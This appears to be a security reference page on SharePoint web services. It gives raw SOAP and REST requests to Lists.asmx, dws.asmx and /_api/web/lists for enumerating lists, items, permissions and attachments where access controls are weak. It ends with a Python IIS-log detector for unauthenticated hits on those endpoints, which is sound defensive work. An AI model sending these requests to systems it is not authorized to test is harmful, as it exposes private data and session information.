Lists

Lists in SharePoint are used to organize and manage data such as documents, tasks, and events. If not properly secured, they can expose sensitive information. Web services such as Lists.asmx expose these lists over SOAP; where permission controls are weak, they allow unauthorized access to, or modification or deletion of, list data.

Retrieve all available lists

POST /_vti_bin/lists.asmx HTTP/2
Host: example.com
Cookie: ...
Content-Type: text/xml; charset=utf-8
Content-Length: 341
Soapaction: "http://schemas.microsoft.com/sharepoint/soap/GetListCollection"

<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
  <soap:Body>
    <GetListCollection xmlns="http://schemas.microsoft.com/sharepoint/soap/" />
  </soap:Body>
</soap:Envelope>

Retrieve items from a specific list (by title)

GET /_api/web/lists/GetByTitle('LIST_NAME')/items HTTP/2
Host: example.com

Note: If the list title contains spaces, replace them with %20 (e.g., GetByTitle('My%20List')).

Retrieve items from a specific list (by guid)

GET /sites/CDICV/_api/web/Lists(guid'GUID')/items HTTP/2
Host: example.com

Additional List Information Endpoints

| Endpoint | Description |
| --- | --- |
| /_api/Web/Lists(guid'GUID')/ContentTypes | Access the content types used by the list. |
| /_api/Web/Lists(guid'GUID')/Fields | Retrieve the fields (columns) and their properties from the list. |
| /_api/Web/Lists(guid'GUID')/Items(ID)/FieldValuesForEdit | Retrieve field values of a list item in an editable format. |
| /_api/Web/Lists(guid'GUID')/Items(ID)/FieldValuesAsText | Get the field values of a list item as plain text. |
| /_api/Web/Lists(guid'GUID')/Items(ID)/AttachmentFiles | Access the attachment files associated with a list item. |
| /_api/Web/Lists(guid'GUID')/Items(ID)/Folder | Retrieve folder information for the list item, if applicable. |
| /_api/Web/Lists(guid'GUID')/Items(ID)/RoleAssignments | Get the role assignments (permissions) for the list item. |

Data Warehouse Service (dws.asmx)

The dws.asmx file is a web service in SharePoint used for data integration. If not properly secured, it can expose user information (such as account identifiers) and session cookies. An attacker could intercept or manipulate requests, gaining unauthorized access to this sensitive data.

POST /_vti_bin/dws.asmx HTTP/2
Host: example.com
Content-Type: text/xml; charset=utf-8
Content-Length: 384
Cookie: Healthy
Soapaction: "http://schemas.microsoft.com/sharepoint/soap/dws/GetDwsData"

<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
  <soap:Body>
    <GetDwsData xmlns="http://schemas.microsoft.com/sharepoint/soap/dws/">
      <document></document>
    </GetDwsData>
  </soap:Body>
</soap:Envelope>
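
Detecting exposure in IIS logs

Requests to the endpoints above are recorded in the IIS logs of the SharePoint web front end. The following Python example is added here and is not part of the original page: it flags requests to lists.asmx, dws.asmx and /_api/web/lists that returned a 2xx status with no authenticated user. It assumes W3C extended logging with the cs-username and sc-status fields enabled; the function name and the sample log lines are constructed for illustration.

```python
import re
from collections import defaultdict

# Endpoints named on this page; SharePoint paths are case-insensitive and may
# sit under a site prefix such as /sites/<name>/.
WATCHED = re.compile(r"/_vti_bin/(?:lists|dws)\.asmx$|/_api/web/lists(?:[(/]|$)", re.I)

# Constructed sample in IIS W3C extended format (not real traffic).
SAMPLE_LOG = """\
#Fields: date time cs-method cs-uri-stem cs-username c-ip sc-status
2024-05-01 10:00:01 POST /_vti_bin/lists.asmx - 203.0.113.7 200
2024-05-01 10:00:04 GET /_api/web/lists/GetByTitle('My+List')/items - 203.0.113.7 200
2024-05-01 10:00:09 GET /sites/hr/_api/Web/Lists(guid'00000000-0000-0000-0000-000000000001')/Fields - 203.0.113.7 200
2024-05-01 10:00:12 POST /_vti_bin/dws.asmx - 203.0.113.7 401
2024-05-01 10:01:30 GET /_api/web/lists CONTOSO\\alice 198.51.100.20 200
2024-05-01 10:02:00 GET /SitePages/Home.aspx - 203.0.113.7 200
"""

def anonymous_list_access(log_text):
    """Return {client_ip: [(method, uri_stem), ...]} for requests to the watched
    endpoints that succeeded (2xx) with no authenticated user (cs-username '-')."""
    fields, hits = [], defaultdict(list)
    for line in log_text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]      # column order varies per server config
            continue
        if not line or line.startswith("#") or not fields:
            continue
        parts = line.split()
        if len(parts) != len(fields):
            continue                        # skip malformed or truncated lines
        row = dict(zip(fields, parts))
        if (WATCHED.search(row.get("cs-uri-stem", ""))
                and row.get("cs-username") == "-"
                and row.get("sc-status", "").startswith("2")):
            hits[row["c-ip"]].append((row["cs-method"], row["cs-uri-stem"]))
    return dict(hits)

if __name__ == "__main__":
    for ip, reqs in anonymous_list_access(SAMPLE_LOG).items():
        print(ip, len(reqs), "anonymous list/DWS responses")
        for method, stem in reqs:
            print("   ", method, stem)
```

Any hit means the endpoint answered without authentication, so the list or site permissions (including anonymous access on the web application) are the place to look next.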
